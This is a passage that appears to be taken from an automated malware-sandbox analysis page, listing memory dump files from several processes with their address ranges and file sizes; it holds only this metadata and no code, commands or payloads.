                                                                                                        Filesize

                                                                                                        136KB

                                                                                                      • memory/3728-28-0x000001F7FC490000-0x000001F7FC506000-memory.dmp
                                                                                                        Filesize

                                                                                                        472KB

                                                                                                      • memory/3728-49-0x00007FFE49E40000-0x00007FFE49EEE000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/4144-697-0x0000000073170000-0x000000007385E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/4144-698-0x0000000005DC0000-0x0000000005DCA000-memory.dmp
                                                                                                        Filesize

                                                                                                        40KB

                                                                                                      • memory/4144-14-0x0000000073170000-0x000000007385E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/4144-13-0x0000000073170000-0x000000007385E000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.9MB

                                                                                                      • memory/4916-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4916-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4916-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4916-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4916-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB

                                                                                                      • memory/4916-59-0x00007FFE4AA30000-0x00007FFE4AC0B000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.9MB

                                                                                                      • memory/4916-60-0x00007FFE49E40000-0x00007FFE49EEE000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/4916-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                        Filesize

                                                                                                        32KB